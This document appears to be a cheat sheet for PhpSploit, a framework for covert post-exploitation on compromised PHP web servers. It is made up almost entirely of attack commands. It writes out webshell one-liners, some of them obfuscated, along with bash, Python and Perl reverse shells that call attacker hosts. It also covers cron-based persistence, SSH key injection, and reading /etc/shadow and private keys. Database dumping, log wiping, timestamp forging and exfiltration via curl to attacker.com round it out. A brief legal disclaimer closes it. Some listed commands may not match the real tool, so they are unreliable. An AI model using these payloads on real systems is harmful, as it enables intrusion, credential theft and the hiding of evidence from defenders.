PhpSploit

Overview

PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.

Key Features:

• Stealth PHP backdoor deployment
• Interactive remote shell environment
• File upload, download, and manipulation
• System enumeration and reconnaissance
• Memory-based operation (minimal disk footprint)
• Anti-detection capabilities
• Multi-session management

Installation

From GitHub

git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploit

Requirements

• Python 3.6+
• A web server with PHP execution capability
• Target web server accessible

Verify Installation

./phpsploit --version
./phpsploit --help

Docker

docker run -it --rm phpsploit

Basic Setup

Start PhpSploit Console

./phpsploit

Connect to Existing Backdoor

phpsploit> connect http://target.com/shell.php

Deploy New Backdoor

phpsploit> upload shell.php http://target.com/upload/

Interactive Shell

phpsploit> shell

Core Commands

Command	Description
connect	Connect to backdoor URL
upload	Deploy backdoor to server
download	Download file from server
shell	Interactive command shell
run	Execute system command
set	Configure framework settings
exploit	Run exploitation modules
sessions	Manage active sessions
help	Display command help
quit	Exit framework

Connection Management

Connect to Backdoor

phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.php

Connection with Proxy

phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.php

Authentication

phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.php

Session Management

phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1  # Kill session

Remote Command Execution

Execute Single Command

phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -a

Interactive Shell Mode

phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exit

Execute Shell Scripts

phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'

Background Command Execution

phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &

File Operations

Upload Files

phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/

Download Files

phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dump

List Remote Directory

phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*

Create/Modify Files

phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOF

System Enumeration

Get System Information

phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run id

Network Information

phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpn

Process Enumeration

phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginx

User and Privilege Information

phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoers

Disk and Storage Information

phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblk

Backdoor Deployment

PHP Backdoor Creation

# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>

# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>

# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>

Deploy Backdoor via PhpSploit

phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.php

Obfuscated Backdoor

# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>

# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>

Persistent Backdoor

# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.php

Post-Exploitation Workflows

Privilege Escalation Enumeration

phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontab

Credential Harvesting

phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsa

Lateral Movement

# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a

# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTEN

Data Exfiltration

# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/

# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64

# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64

Advanced Configuration

Set User Agent

phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"

Proxy Configuration

phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050

Timeout Settings

phpsploit> set timeout 30
phpsploit> set connect_timeout 10

Request Headers

phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"

Verbosity and Logging

phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.log

Exploitation Techniques

Reverse Shell Deployment

# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &

# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"

# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"

Cron Job Persistence

phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -

SSH Key Injection

phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Database Access

phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"

Defense Evasion

Process Hiding

# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/command

Timestamp Manipulation

phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.php

Log Sanitization

phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_history

Firewall Bypass

# DNS tunneling
phpsploit> run nslookup attacker.com

# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)

Scripting and Automation

Create PhpSploit Script

#!/bin/bash
# automated_exploitation.sh

TARGET="http://target.com/shell.php"

phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOF

Batch Command Execution

phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'

Real-World Attack Scenarios

Web Server Compromise

# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/

# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php

# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id

# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.php

Database Extraction

# Identify database
phpsploit> run find / -name "*.env" | grep -i database

# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE

# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sql

Application Server Escalation

# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"

# Check for vulnerable services
phpsploit> run netstat -tulpn

# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null

Troubleshooting

Connection Issues

# Verify backdoor accessibility
curl http://target.com/shell.php

# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.php

Command Execution Problems

# Test basic commands
phpsploit> run echo test
phpsploit> run id

# Check PHP version
phpsploit> run php --version

File Transfer Issues

# Verify file permissions
phpsploit> run ls -la /var/www/html/

# Check available space
phpsploit> run df -h /var/www/html/

Security Best Practices

Operational Security

• Use VPN/proxy for all connections
• Rotate backdoor locations regularly
• Clean logs and evidence of activity
• Use encrypted communication when possible
• Establish dead drops for communication

Detection Avoidance

• Use legitimate PHP functions
• Avoid suspicious filenames
• Minimize footprint on disk
• Use appropriate timing for activities
• Monitor system for detection indicators

Version and Support

./phpsploit --version

Legal and Ethical Considerations

Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.